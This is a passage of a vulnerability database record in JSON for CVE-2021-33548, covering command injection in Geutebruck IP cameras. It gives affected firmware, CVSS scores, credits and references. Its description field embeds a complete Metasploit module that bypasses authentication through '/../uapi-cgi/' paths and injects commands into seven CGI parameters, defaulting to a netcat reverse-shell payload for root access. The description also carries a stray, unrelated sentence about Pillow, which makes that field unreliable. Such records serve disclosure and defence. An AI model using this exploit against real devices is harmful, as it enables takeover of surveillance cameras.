          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0857",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33548",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33548",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33548",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33548",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33548",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2089",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33548",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "id": "VAR-202109-0857",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T22:14:46.195000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158069"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
